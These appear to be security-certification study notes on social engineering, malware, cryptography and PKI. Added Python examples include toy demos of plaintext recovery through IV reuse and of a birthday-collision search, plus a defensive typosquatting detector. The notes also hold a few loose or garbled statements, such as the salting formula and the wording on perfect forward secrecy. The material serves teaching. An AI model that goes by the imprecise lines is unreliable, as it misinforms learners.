● Pivoting: If the pen tester achieves a foothold on a perimeter server, a pivot
allows them to bypass a network boundary and compromise servers on an inside
network.
○ A pivot is normally accomplished using remote access and tunneling
protocols, such as Secure Shell (SSH), virtual private networking (VPN),
or remote desktop.

Lesson 4: Identifying Social Engineering and Malware


Social Engineering
● Social engineering can also be referred to as "hacking the human."

Phishing, Whaling, and Vishing


● Vishing—a phishing attack conducted through a voice channel (telephone or
VoIP, for instance).
● Whaling—a spear phishing attack directed specifically against upper levels of
management in the organization (CEOs and other "big fish").

● SMiShing—this refers to using short message service (SMS) text
communications as the vector.

Hoaxes, Spam and Prepending

● Hoaxes:
○ An email alert or web pop-up will claim to have identified some sort of
security problem, such as virus infection, and offer a tool to fix the
problem.
● Prepending: adding text that appears to have been generated by the mail
system.
○ For example, an attacker may add "RE:" to the subject line to make it
appear as though the message is a reply or may add something like
"MAILSAFE: PASSED" to make it appear as though a message has been
scanned and accepted by some security software.

Pharming and Credential Harvesting

● Pharming:
○ A passive means of redirecting users from a legitimate website to a
malicious one.
○ Pharming relies on corrupting the way the victim's computer performs
Internet name resolution, so that they are redirected from the genuine site
to the malicious one.
● Typosquatting:
○ This means that the threat actor registers a domain name that is very
similar to a real one, such as connptia.org, hoping that users will not
notice the difference.
● Watering Hole Attack:
○ An attack in which an attacker targets specific groups or organizations,
discovers which websites they frequent, and injects malicious code into
those sites.
● Credential Harvesting:
○ Social engineering techniques for gathering valid credentials to use to gain
unauthorized access.
○ The attacker may have more interest in selling the database of captured
logins than trying to exploit them directly.
○ Such attacks will use an alarming message such as "Your account is
being used to host child pornography" or "There is a problem with your
account storage" and a link to a pharming site embroidered with the logos
of a legitimate service provider, such as Google, Microsoft, Facebook, or
Twitter.
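
A defender-side check for the typosquatting case above, as an added example that is not part of the original notes: it flags observed host names whose registered domain is within a small edit distance of a domain the organization owns. The host list is constructed sample data, and the two-label domain rule and the distance threshold of 2 are assumptions.

```python
# Domain the organization actually owns (taken from the notes' example).
PROTECTED = ["comptia.org"]

# Constructed sample of host names, as might be pulled from proxy or DNS logs.
OBSERVED = [
    "www.comptia.org",
    "members.comptia.org",
    "connptia.org",
    "www.connptia.org",
    "example.net",
]


def registrable(host: str) -> str:
    """Return the last two labels of a host name.

    Assumption: ignores multi-label public suffixes such as co.uk.
    """
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance: insertions, deletions and substitutions."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete from a
                           cur[j - 1] + 1,              # insert into a
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def find_lookalikes(hosts, protected=PROTECTED, max_distance=2):
    """Return (host, protected_domain, distance) for near-miss domains.

    Distance 0 is the genuine domain and is never reported.
    """
    findings = []
    for host in hosts:
        domain = registrable(host)
        for good in protected:
            distance = edit_distance(domain, good)
            if 0 < distance <= max_distance:
                findings.append((host, good, distance))
    return findings


if __name__ == "__main__":
    for host, good, distance in find_lookalikes(OBSERVED):
        print(f"{host}: {distance} edits away from {good}")
```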

Influence Campaigns

● A major program launched by an adversary with a high level of capability, such
as a nation-state actor, terrorist group, or hacktivist group.
● The goal of an influence campaign is to shift public opinion on some topic.

Malware Classification

● Potentially unwanted programs (PUPs)/Potentially unwanted applications
(PUAs)—software installed alongside a package selected by the user or perhaps
bundled with a new computer system.

Computer Viruses
● Non-resident/file infector—the virus is contained within a host executable file and
runs with the host process.
○ The virus will try to infect other process images on persistent storage and
perform other payload actions.
● Memory resident—when the host file is executed, the virus creates a new
process for itself in memory.
○ The malicious process remains in memory, even if the host process is
terminated.
● Boot—the virus code is written to the disk boot sector or the partition table of a
fixed disk or USB media, and executes as a memory resident process when the
OS starts or the media is attached to the computer.
● Script and macro viruses—the malware uses the programming features available
in local scripting engines for the OS and/or browser, such as PowerShell.
● Multipartite is used for viruses that use multiple vectors, and polymorphic for
viruses that can dynamically change or obfuscate their code to evade detection.

Computer Worms and Fileless Malware

● A worm is memory-resident malware that can run without user intervention and
replicate over network resources.
○ A worm can execute by exploiting a vulnerability in a process when the
user browses a website, runs a vulnerable server application, or is
connected to an infected file share.
● Fileless Malware:
○ Fileless malware does not write its code to disk.
■ The malware uses memory resident techniques to run in its own
process, within a host process or dynamic link library (DLL).
○ Fileless malware uses lightweight shellcode to achieve a backdoor
mechanism on the host.
■ Shellcode: Lightweight block of malicious code that exploits a
software vulnerability to gain initial access to a victim system.
○ Fileless malware may use "live off the land" techniques rather than
compiled executables to evade detection.
■ This means that the malware code uses legitimate system scripting
tools, notably PowerShell and Windows Management
Instrumentation (WMI), to execute payload actions.

Spyware and Keyloggers

● Tracking cookies—A cookie is a plaintext file, not malware, but if permitted by
browser settings, third-party cookies can be used to record pages visited, the
user's IP address and various other metadata, such as search queries and
information about the browser software.
● Adware—this is a class of PUP/grayware that performs browser
reconfigurations, such as allowing tracking cookies, changing default search
providers, opening sponsor's pages at startup, adding bookmarks, and so on.
● Spyware—this is malware that can perform adware-like tracking, but also
monitor local application activity, take screenshots, and activate recording
devices, such as a microphone or webcam.
● A keylogger is spyware that actively attempts to steal confidential information by
recording keystrokes.

Backdoors and Remote Access Trojans

● Any type of access method to a host that circumvents the usual authentication
method and gives the remote user administrative control can be referred to as a
backdoor.
● A remote access trojan (RAT) is backdoor malware that mimics the functionality
of legitimate remote control programs, but is designed specifically to operate
covertly.
● A bot is an automated script or tool that performs some malicious activity.
● A group of bots that are all under the control of the same malware instance can
be manipulated as a botnet by the herder program.
● Command and Control (C2 or C&C): An infrastructure of hosts and services with
which attackers direct, distribute, and control malware over botnets.
● Covert Channel: A type of attack that subverts network security systems and
policies to transfer data without authorization or detection.
○ Historically, the Internet relay chat (IRC) protocol was popular.

Rootkits

● A class of malware that modifies system files, often at the kernel level, to conceal
its presence.
● A process running as root has unrestricted access to everything from the root of
the file system down.

Ransomware, Crypto-Malware, and Logic Bombs

● Logic Bomb: A malicious program or script that is set to run under particular
circumstances or in response to a defined event.

Malware Indicators

● Antivirus Notifications:
○ Endpoint Protection Platforms (EPPs): A software agent and monitoring
system that performs multiple security tasks.
○ User and Entity Behavior Analytics (UEBA): A system that can provide
automated identification of suspicious activity by user accounts and
computer hosts.
● Resource Consumption:
○ Abnormal resource consumption can be detected using a performance
monitor, Task Manager, or the top Linux utility.
○ Also, it is only really poorly written malware or malware that performs
intensive operations (botnet DDoS, cryptojacking, and crypto ransomware,
for instance) that displays this behavior.
● File System:
○ While fileless malware is certainly prevalent, file system change or
anomaly analysis is still necessary.
○ A computer's file system stores a great deal of useful metadata about
when files were created, accessed, or modified.
● Sandbox Execution:
○ A sandbox is a system configured to be completely isolated from its host
so that the malware cannot "break out."
○ Cuckoo is packaged software that aims to provide a turnkey sandbox
solution, though the project is inactive at time of writing.

Process Analysis

● Abnormal Process Behavior: Indicators that a legitimate OS process has been
corrupted with malicious code for the purpose of damaging or compromising the
system.
● Sysinternals: A suite of tools designed to assist with troubleshooting issues with
Windows.
○ The Sysinternals tool Process Explorer is an enhanced version of Task
Manager.

Lesson 5: Summarizing Basic Cryptographic Concepts

Cryptographic Concepts

● Cryptography (literally meaning "secret writing") has been around for thousands
of years. It is the art of making information secure by encoding it.
● The following terminology is used to discuss cryptography:
○ Plaintext (or cleartext)—an unencrypted message.
○ Ciphertext—an encrypted message.
○ Cipher—the process (or algorithm) used to encrypt and decrypt a
message.
○ Cryptanalysis—the art of cracking cryptographic systems.

Hashing Algorithms
● A cryptographic hashing algorithm produces a fixed length string from an input
plaintext that can be of any length.
● The output can be referred to as a checksum, message digest, or hash.
● A hashing algorithm is used to prove integrity.
● As well as comparing password values, a hash of a file can be used to verify the
integrity of that file after transfer.

Encryption Ciphers and Keys


● While a hash function can be used to prove the integrity of data, it cannot be
used to store or transmit data.
● Substitution and Transposition Ciphers:
○ A substitution cipher involves replacing units (a letter or blocks of letters)
in the plaintext with different ciphertext.
■ Simple substitution ciphers rotate or scramble letters of the
alphabet.
○ In a transposition cipher, the units stay the same in plaintext and ciphertext, but their
order is changed, according to some mechanism.
● Keys and Secret Ciphers:
○ The key is important because it means that even if the cipher method is
known, a message still cannot be decrypted without knowledge of the
specific key.

Symmetric Encryption
● Symmetric encryption is very fast. It is used for bulk encryption of large amounts
of data.
● The main problem is secure distribution and storage of the key, or the exact
means by which Alice and Bob "meet" to agree on the key.

Stream and Block Ciphers
● In a stream cipher, each byte or bit of data in the plaintext is encrypted one at a
time.
○ The plaintext is combined with a separate randomly generated message,
calculated from the key and an initialization vector (IV).
■ The IV ensures the key produces a unique ciphertext from the
same plaintext.
○ The keystream must be unique, so an IV must not be reused with the
same key.
● In a block cipher, the plaintext is divided into equal-size blocks (usually 128-bit).
○ If there is not enough data in the plaintext, it is padded to the correct size
using some string defined in the algorithm.
○ The Advanced Encryption Standard (AES) is the default symmetric
encryption cipher for most products.
● Recommendations on minimum key length for any given algorithm are made by
identifying whether the algorithm is vulnerable to cryptanalysis techniques and by
the length of time it would take to "brute force" the key, given current processing
resources.
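
Why an IV must not be reused with the same key in a stream cipher, as an added example that is not part of the original notes. The keystream generator is a toy built from SHA-256 purely for illustration (an assumption, not a real cipher), and both messages are constructed sample data.

```python
import hashlib
import secrets

# Constructed sample messages of equal length.
P1 = b"TRANSFER 0100 USD TO ACCT 1111"
P2 = b"TRANSFER 9999 USD TO ACCT 2222"


def keystream(key: bytes, iv: bytes, length: int) -> bytes:
    """Toy keystream: SHA-256(key || iv || counter) blocks, illustration only."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + iv + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Stream encryption: plaintext XOR keystream. Decryption is the same call."""
    return xor_bytes(plaintext, keystream(key, iv, len(plaintext)))


def demo_iv_reuse() -> dict:
    key = secrets.token_bytes(32)
    iv = secrets.token_bytes(16)

    c1 = encrypt(key, iv, P1)
    c2 = encrypt(key, iv, P2)          # same key AND same IV: keystream repeats

    # The identical keystream cancels out: c1 XOR c2 == P1 XOR P2, no key needed.
    leak = xor_bytes(c1, c2)
    # Anyone who knows (or guesses) P1 now reads P2 directly.
    recovered = xor_bytes(leak, P1)

    # With a fresh IV the keystreams differ and nothing cancels.
    c3 = encrypt(key, secrets.token_bytes(16), P2)
    fresh_leak = xor_bytes(c1, c3)

    return {
        "roundtrip": encrypt(key, iv, c1),
        "leak": leak,
        "recovered": recovered,
        "fresh_leak": fresh_leak,
    }


if __name__ == "__main__":
    result = demo_iv_reuse()
    print("recovered with reused IV:", result["recovered"])
    print("fresh IV leaks P1^P2?   :", result["fresh_leak"] == xor_bytes(P1, P2))
```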

Asymmetric Encryption
● With an asymmetric cipher, operations are performed by two different but related
public and private keys in a key pair.
● The message cannot be larger than the key size. Where a large amount of data
is being encrypted on disk or transported over a network, asymmetric encryption
is inefficient.

Public Key Cryptography Algorithms


● Asymmetric encryption is often referred to as public key cryptography.
● Many public key cryptography products are based on the RSA algorithm.
○ The RSA algorithm provides the mathematical properties for deriving key
pairs and performing the encryption and decryption operations.
○ This type of algorithm is called a trapdoor function, because it is easy to
perform using the public key, but difficult to reverse without knowing the
private key.
● Elliptic curve cryptography (ECC) is another type of trapdoor function that can
be used in public key cryptography ciphers.
○ The principal advantage of ECC over RSA's algorithm is that there are no
known "shortcuts" to cracking the cipher or the math that underpins it.

Digital Signatures
● A message digest encrypted using the sender's private key that is appended to a
message to authenticate the sender and prove message integrity.
● 1. Alice (the sender) creates a digest of a message, using a pre-agreed hash
algorithm, and encrypts the digest using Alice’s private key. This creates Alice’s
digital signature.
● 2. Alice attaches the digital signature and sends both the message and public
key to Bob (the receiver).
● 3. Bob decrypts the digital signature using Alice's public key, resulting in the
digest of the message.
● 4. Bob then creates a digest of the message, using the same pre-agreed hash
algorithm that Alice used. Bob compares both digests.
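
The four steps above, as an added example that is not part of the original notes. It uses textbook RSA with a toy key pair built from small known primes and no padding; the key sizes, the reduction of the digest modulo n, and the Mallory key are all assumptions made so the example runs with the standard library only.

```python
import hashlib

E = 65537  # common public exponent


def make_toy_key(p: int, q: int) -> dict:
    """Build a toy RSA key pair from two primes (far too small for real use)."""
    n = p * q
    d = pow(E, -1, (p - 1) * (q - 1))   # private exponent
    return {"n": n, "e": E, "d": d}


def public_part(key: dict) -> dict:
    """What Alice may hand out: modulus and public exponent only."""
    return {"n": key["n"], "e": key["e"]}


# Toy keys built from Mersenne primes (assumption, illustration only).
ALICE = make_toy_key(2**61 - 1, 2**89 - 1)
MALLORY = make_toy_key(2**107 - 1, 2**127 - 1)


def digest_as_int(message: bytes, n: int) -> int:
    """Pre-agreed hash (SHA-256), reduced to fit the toy modulus."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def sign(message: bytes, private: dict) -> int:
    """Step 1: hash the message, then transform the digest with the private key."""
    return pow(digest_as_int(message, private["n"]), private["d"], private["n"])


def verify(message: bytes, signature: int, public: dict) -> bool:
    """Steps 3 and 4: recover the digest with the public key and compare it
    with a digest computed independently from the received message."""
    recovered = pow(signature, public["e"], public["n"])
    return recovered == digest_as_int(message, public["n"])


if __name__ == "__main__":
    message = b"Pay Bob 100 USD"
    signature = sign(message, ALICE)                     # step 1
    alice_pub = public_part(ALICE)                       # step 2: sent with message
    print("genuine :", verify(message, signature, alice_pub))
    print("tampered:", verify(b"Pay Bob 900 USD", signature, alice_pub))
    print("forged  :", verify(message, sign(message, MALLORY), alice_pub))
```

Production signature schemes add padding (for example RSA-PSS) and use keys of 2048 bits or more; the comparison of two independently derived digests is the part this example shares with them.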

Digital Envelopes and Key Exchange


● Public key cryptography makes it easy to distribute a key, but can only be used
efficiently with small amounts of data.
○ Therefore, both are used within the same product in a type of key
exchange system known as a digital envelope or hybrid encryption.
● A digital envelope allows the sender and recipient to exchange a symmetric
encryption key securely by using public key cryptography.

Digital Certificates
● The question then arises of how anyone can trust the identity of the person or
server issuing a public key.
● One solution is to have a third party, referred to as a certificate authority (CA),
validate the owner of the public key by issuing the subject with a certificate.
● The process of issuing and verifying certificates is called public key infrastructure
(PKI).

Perfect Forward Secrecy


● A characteristic of transport encryption that ensures if a key is compromised the
compromise will only affect a single session and not facilitate recovery of
plaintext data from other sessions.
● Diffie-Hellman (DH): agreement to create ephemeral session keys without using
the server's private key.
○ Ephemeral: In cryptography, a key that is used within the context of a
single session only.
● Using ephemeral session keys means that any future compromise of the server
will not translate into an attack on recorded data.
● Also, even if an attacker can obtain the key for one session, the other sessions
will remain confidential.
● PFS can be implemented using either the Diffie-Hellman Ephemeral mode
(DHE or EDH).

Cipher Suites and Modes of Operation


● In a protocol such as Transport Layer Security (TLS), the requirements to both
authenticate the identity of the server and to encrypt communications between
the server and client need to be fulfilled by separate cryptographic products and
cipher implementations.
● Cipher Suite: Lists of cryptographic algorithms that a server and client can use to
negotiate a secure connection.
● Cipher Block Chaining (CBC) Mode:
○ Applies an initialization vector (IV) to the first plaintext block to ensure that
the key produces a unique ciphertext from any given plaintext.
○ The output of the first ciphertext block is then combined with the next
plaintext block using an XOR operation.
● Counter Mode:
○ Counter mode applies an IV plus an incrementing counter value to the key
to generate a keystream.
○ Each block can be processed individually and consequently in parallel,
improving performance.

Authenticated Modes of Operation


● Authenticated Encryption:
○ Provides an authentication and integrity mechanism by hashing a
combination of the message output and a shared secret key.
● Authenticated Encryption with Additional Data (AEAD):
○ In an AEAD scheme, the associated data allows the receiver to use the
message header to ensure the payload has not been replayed from a
different communication stream.

Cryptography Supporting Authentication and Non-Repudiation


● Cryptographic Primitive: A single hash function, symmetric cipher, or asymmetric
cipher.
● Non-repudiation is linked to identification and authentication.
○ It is the concept that the sender cannot deny sending the message.
○ If the message has been encrypted in a way known only to the sender, it
follows that the sender must have composed it.
● Authentication and non-repudiation depend on the recipient not being able to
encrypt the message, or the recipient would be able to impersonate the sender.

Cryptography Supporting Confidentiality


● File Encryption:
○ The user is allocated an asymmetric cipher key pair.
○ The private key is written to secure storage—often a trusted platform
module (TPM)—and is only available when the user has authenticated to
his or her account.
● Transport Encryption:
○ This uses either digital envelopes or perfect forward secrecy.
○ For HTTPS, a web server is allocated a key pair and stores the private key
securely.
■ The public key is distributed to clients via a digital certificate.
■ The client and server use the key pair to exchange or agree on one
or more AES cipher keys to use as session keys.

Cryptography Supporting Integrity and Resiliency
● Integrity is proved by hashing algorithms, which allow two parties to derive the
same checksum and show that a message or data has not been tampered with.
● A basic hash function can also be used with a shared secret to create a
message authentication code (MAC), which prevents a man-in-the-middle
tampering with the checksum.
● Obfuscation is the art of making a message difficult to understand.

Cryptographic Performance Limitations


● Main Performance factors of Ciphers:
○ Speed—for symmetric ciphers and hash functions, speed is the amount of
data per second that can be processed.
■ Asymmetric ciphers are measured by operations per second.
○ Time/latency—for some use cases, the time required to obtain a result is
more important than a data rate.
■ For example, when a secure protocol depends on ciphers in the
handshake phase, no data transport can take place until the
handshake is complete.
○ Size—the security of a cipher is strongly related to the size of the key, with
longer keys providing better security.
○ Computational overheads—in addition to key size selection, different
ciphers have unique performance characteristics.
■ Some ciphers require more CPU and memory resources than
others, and are less suited to use in a resource-constrained
environment.
○ Low power devices—some technologies or ciphers configured with longer
keys require more processing cycles and memory space.
■ This makes them slower and means they consume more power.
○ Low latency uses—this can impact protocol handshake setup times.
■ A longer handshake will manifest as delay for the user, and could
cause timeout issues with some applications.

Cryptographic Security Limitations
● Entropy: A measure of disorder. Cryptographic systems should exhibit high
entropy to better resist brute force attacks.
● A weak key is one that produces ciphertext that is lower entropy than it should
be.
● Predictability: a weakness in either the cipher operation or within particular key
values that make a ciphertext lower entropy and vulnerable to cryptanalysis.
○ Reuse of the same key within the same session can cause this type of
weakness.
● Nonce—the principal characteristic of a nonce is that it is never reused ("number
used once") within the same scope (that is, with the same key value).
● Initialization vector (IV)—the principal characteristic of an IV is that it is random
(or pseudo-random).
● Salt: A security countermeasure that mitigates the impact of a rainbow table
attack by adding a random value to ("salting") each plaintext input.

Longevity and Cryptographic Attacks


● Longevity is a measure of the confidence that people have in a given cipher.
● In another sense, longevity is the consideration of how long data must be kept
secure.

Man-In-The-Middle and Downgrade Attacks


● Cryptographic attacks are used to try to intercept confidential data or to spoof
cryptographic credentials, such as a digital certificate.
● A man-in-the-middle (MITM) attack is typically focused on public key
cryptography.
○ 1. Mallory eavesdrops the channel between Alice and Bob and waits for
Alice to request Bob's public key.
○ 2. Mallory intercepts the communication, retaining Bob's public key, and
sends Mallory's public key to Alice.
○ 3. Alice uses Mallory's key to encrypt a message and sends it to Bob.
○ 4. Mallory intercepts the message and decrypts it using Mallory's private
key.
○ 5. Mallory then encrypts a message (possibly changing it) with Bob's
public key and sends it to Bob, leaving Alice and Bob oblivious to the fact
that their communications have been compromised.
● This attack is prevented by using secure authentication of public keys, such as
associating the keys with certificates.
● Downgrade Attack:
○ Used to facilitate a man-in-the-middle attack by requesting that the server
use a lower specification protocol with weaker ciphers and key lengths.
○ For example, rather than use TLS 1.3, as the server might prefer, the
client requests the use of SSL.
○ It then becomes easier for Mallory to forge the signature of a certificate
authority that Alice trusts and have Alice trust Mallory's public key.

Salting
● Passwords stored as hashes are vulnerable to brute force and dictionary attacks.
● A password hash cannot be decrypted; hash functions are one-way.
● However, an attacker can generate hashes to try to find a match for a password
hash captured from network traffic or a password file.
● A brute force attack simply runs through every possible combination of letters,
numbers, and symbols.
● A dictionary attack creates hashes of common words and phrases.
● Both these attacks can be slowed down by adding a salt value when creating the
hash, so you compute:
○ (salt + password) * SHA = hash
○ It simply means that an attacker cannot use precomputed tables of
hashes.
○ The hash values must be recompiled with the specific salt value for each
password.

Key Stretching
● Takes a key that's generated from a user password and repeatedly converts it to
a longer and more random key.
● The initial key may be put through thousands of rounds of hashing.
● The Password-Based Key Derivation Function 2 (PBKDF2) is very widely
used for this purpose, notably as part of Wi-Fi Protected Access (WPA).
○ Implementation of key stretching to make potentially weak input used to
derive a cryptographic key, such as short passwords, less susceptible to
brute force attacks.
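
Salting and key stretching together, as an added example that is not part of the original notes: unsalted SHA-256 hashes of the same password are identical and fall to a precomputed table, while per-user salted PBKDF2 records do not. The record format, the iteration count and the sample passwords are assumptions made for the example.

```python
import hashlib
import hmac
import secrets

ITERATIONS = 600_000  # assumption: tune to your own hardware and policy


def unsalted_hash(password: str) -> str:
    """Weak storage form: a bare SHA-256 of the password."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_precomputed_table(wordlist) -> dict:
    """Stand-in for a precomputed hash table: digest -> password."""
    return {unsalted_hash(word): word for word in wordlist}


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    """Salted, stretched record: algorithm$iterations$salt$derived_key."""
    salt = secrets.token_bytes(16)                       # unique per password
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute with the stored salt and iteration count, compare in constant time."""
    _algorithm, iterations, salt_hex, dk_hex = record.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


if __name__ == "__main__":
    # Constructed sample data: two users who picked the same password.
    table = build_precomputed_table(["password", "letmein", "summer2024"])

    alice_weak = unsalted_hash("summer2024")
    bob_weak = unsalted_hash("summer2024")
    print("unsalted hashes identical :", alice_weak == bob_weak)
    print("found in precomputed table:", table.get(alice_weak))

    alice_rec = hash_password("summer2024")
    bob_rec = hash_password("summer2024")
    print("salted records identical  :", alice_rec == bob_rec)
    print("derived key in table      :", alice_rec.split("$")[3] in table)
    print("correct password verifies :", verify_password("summer2024", alice_rec))
```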

Collisions and The Birthday Attack


● A birthday attack is a type of brute force attack aimed at exploiting collisions in
hash functions.
● A collision is where a function produces the same hash value for two different
plaintexts.
○ This type of attack can be used for the purpose of forging a digital
signature.
○ 1. The attacker creates a malicious document and a benign document that
produce the same hash value. The attacker submits the benign document
for signing by the target.
○ 2. The attacker then removes the signature from the benign document and
adds it to the malicious document, forging the target's signature.
● To exploit the paradox, the attacker creates multiple malicious and benign
documents, both featuring minor changes (punctuation, extra spaces, and so on).
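
Why digest length decides collision resistance, as an added example that is not part of the original notes. It models the benign/malicious variant search described above against SHA-256 truncated to 24 bits, where a match appears after a few thousand hashes instead of millions. The truncation, the document texts and the revision-tag variation are assumptions.

```python
import hashlib

BENIGN = b"Contract: pay the supplier 100 USD."       # constructed sample text
MALICIOUS = b"Contract: pay the supplier 9000 USD."   # constructed sample text


def truncated_digest(data: bytes, bits: int) -> int:
    """Top `bits` bits of SHA-256, standing in for a short, weak hash."""
    full = int.from_bytes(hashlib.sha256(data).digest(), "big")
    return full >> (256 - bits)


def find_cross_collision(benign_text: bytes, malicious_text: bytes, bits: int):
    """Generate variants of both documents until one benign and one malicious
    variant share a truncated digest.

    Returns (benign_variant, malicious_variant, hashes_computed).
    """
    benign, malicious = {}, {}
    i = 0
    while True:
        b = benign_text + b" [rev %d]" % i       # minor change per variant
        m = malicious_text + b" [rev %d]" % i
        hb = truncated_digest(b, bits)
        hm = truncated_digest(m, bits)

        benign[hb] = b
        if hm in benign:
            return benign[hm], m, 2 * (i + 1)
        malicious[hm] = m
        if hb in malicious:
            return b, malicious[hb], 2 * (i + 1)
        i += 1


if __name__ == "__main__":
    bits = 24
    good, bad, work = find_cross_collision(BENIGN, MALICIOUS, bits)
    print(f"{bits}-bit digest collided after {work} hashes "
          f"(exhaustive search would need about {2**bits})")
    print("benign   :", good)
    print("malicious:", bad)
    # The same search against the full 256-bit digest needs on the order of
    # 2**128 hashes, which is why untruncated modern digests are used for signing.
```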

Quantum and Post-Quantum


● Quantum refers to computers that use properties of quantum mechanics to
significantly out-perform classical computers at certain tasks.
● A quantum computer performs processing on units called qubits (quantum bits).
○ A qubit can be set to 0 or 1 or an indeterminate state called a
superposition, where there is a probability of it being either 1 or 0.
○ The power of quantum computing comes from the fact that qubits can be
entangled.
○ The strength of this architecture is that a single operation can utilize huge
numbers of state variables represented as qubits, while a classical
computer's CPU must go through a read, execute, write cycle for each bit
of memory.
● Communications:
○ The properties of entanglement, superposition, and collapse suit the
design of a tamper-evident communication system that would allow secure
key agreement.
● Post-Quantum:
○ Post-quantum refers to the expected state of computing when quantum
computers that can perform useful tasks are a reality.
○ Currently, the physical properties of qubits and entanglement make
quantum computers very hard to scale up.
● Lightweight Cryptography:
○ NIST is hoping that a compact cipher suite will be developed that is both
quantum resistant and that can run on battery-powered devices with
minimal CPU and memory resources.

Homomorphic Encryption
● Homomorphic encryption is principally used to share privacy-sensitive data sets.
● Homomorphic encryption is a solution for this use case because it allows the
receiving company to perform statistical calculations on fields within the data
while keeping the data set as a whole encrypted.
● For example, if you want to perform analytics on customer interactions, an
analysis tool will be able to sum logons without any account identifiers like email
addresses ever being decrypted.

Blockchain
● Blockchain is a concept in which an expanding list of transactional records is
secured using cryptography.
● Each record is referred to as a block and is run through a hash function.
● The hash value of the previous block in the chain is added to the hash calculation
of the next block in the chain.
● Blockchain ensures availability through decentralization, and integrity through
cryptographic hashing and timestamping.
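
The hash chaining described above, as an added example that is not part of the original notes: each block's hash covers the previous block's hash, so editing an old record is detected either at the edited block or, if its hash is recomputed, at the block that follows. The block fields, the JSON encoding and the sample records are assumptions.

```python
import hashlib
import json

GENESIS_PREV = "0" * 64  # placeholder "previous hash" for the first block


def block_hash(block: dict) -> str:
    """SHA-256 over the block's contents, including the previous block's hash."""
    payload = json.dumps(
        {k: block[k] for k in ("index", "timestamp", "data", "prev_hash")},
        sort_keys=True,
    ).encode()
    return hashlib.sha256(payload).hexdigest()


def append_block(chain: list, data: str, timestamp: int) -> dict:
    """Add a record, linking it to the hash of the block before it."""
    prev_hash = chain[-1]["hash"] if chain else GENESIS_PREV
    block = {"index": len(chain), "timestamp": timestamp,
             "data": data, "prev_hash": prev_hash}
    block["hash"] = block_hash(block)
    chain.append(block)
    return block


def first_invalid_block(chain: list):
    """Return the index of the first block that fails verification, or None."""
    for i, block in enumerate(chain):
        expected_prev = chain[i - 1]["hash"] if i else GENESIS_PREV
        if block["prev_hash"] != expected_prev:
            return i                      # link to the previous block is broken
        if block["hash"] != block_hash(block):
            return i                      # contents no longer match the hash
    return None


def build_sample_chain() -> list:
    """Constructed sample ledger with fixed timestamps."""
    chain = []
    append_block(chain, "Alice pays Bob 5", 1700000000)
    append_block(chain, "Bob pays Carol 2", 1700000060)
    append_block(chain, "Carol pays Dave 1", 1700000120)
    return chain


if __name__ == "__main__":
    chain = build_sample_chain()
    print("untouched chain      :", first_invalid_block(chain))
    chain[1]["data"] = "Bob pays Mallory 200"
    print("record edited        :", first_invalid_block(chain))
    chain[1]["hash"] = block_hash(chain[1])   # hash recomputed to hide the edit
    print("edited and re-hashed :", first_invalid_block(chain))
```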

Steganography
● Steganography (literally meaning "hidden writing") is a technique for obscuring
the presence of a message.
● The container document or file is called the covertext.
● A steganography tool is software that either facilitates this or conversely that can
be used to detect the presence of a hidden message within a covertext.
● These methods might be used for command and control or to exfiltrate data
covertly, bypassing protection mechanisms such as data loss prevention.

Lesson 6: Implementing Public Key Infrastructure

Public and Private Key Usage

● When you want others to send you confidential messages, you give them your
public key to use to encrypt the message.
● The message can then only be decrypted by your private key, which you keep
known only to yourself.
● When you want to authenticate yourself to others, you create a signature and
sign it by encrypting the signature with your private key.
○ You give others your public key to use to decrypt the signature. As only
you know the private key, everyone can be assured that only you could
have created the signature.
● Public key infrastructure (PKI) aims to prove that the owners of public keys are
who they say they are.

Certificate Authorities
● The certificate authority (CA) is the entity responsible for issuing and
guaranteeing certificates.
● Ensure the validity of certificates and the identity of those applying for them
(registration).
● Establish trust in the CA by users and government and regulatory authorities and
enterprises, such as financial institutions.
● Manage the servers (repositories) that store and administer the certificates.
● Perform key and certificate lifecycle management, notably revoking invalid
certificates.

PKI Trust Models


● The trust model is a critical PKI concept, and shows how users and different CAs
are able to trust one another.
● Single CA:
○ a single CA issues certificates to users; users trust certificates issued by
that CA and no other.
○ The problem with this approach is that the single CA server is very
exposed. If it is compromised, the whole PKI collapses.
● Hierarchical (Intermediate CA):
○ In the hierarchical model, a single CA (called the root) issues certificates
to several intermediate CAs.
○ The intermediate CAs issue certificates to subjects (leaf or end entities).
○ This model has the advantage that different intermediate CAs can be set
up with different certificate policies, enabling users to perceive clearly
what a particular certificate is designed for.

Registration Authorities and CSRs


● Registration is the process by which end users create an account with the CA
and become authorized to request certificates.
● When a subject wants to obtain a certificate, it completes a certificate signing
request (CSR) and submits it to the CA.
○ The CSR is a Base64 ASCII file containing the information that the subject
wants to use in the certificate, including its public key.
● The CA reviews the certificate and checks that the information is valid.
○ For a web server, this may simply mean verifying that the subject name
and fully qualified domain name (FQDN) are identical, and verifying that
the CSR was initiated by the person administratively responsible for the
domain, as identified in the domain's WHOIS records.
● Registration Authorities (RAs): These entities complete identity checking and
submit CSRs on behalf of end users, but they do not actually sign or issue
certificates.

Digital Certificates
● A digital certificate is issued by a Certificate Authority (CA) as a guarantee that a
public key it has issued to an organization to encrypt messages sent to it
genuinely belongs to that organization.
● Public Key Cryptography Standards (PKCS): Series of standards defining the
use of certificate authorities and digital certificates.

Certificate Attributes

Subject Name Attributes


● Common Name: An X.500 attribute expressing a host or user name, also used as
the subject identifier for a digital certificate.
○ Consequently, the CN attribute is deprecated as a method of validating
subject identity.
● The subject alternative name (SAN) extension field is structured to represent
different types of identifiers, including domain names.
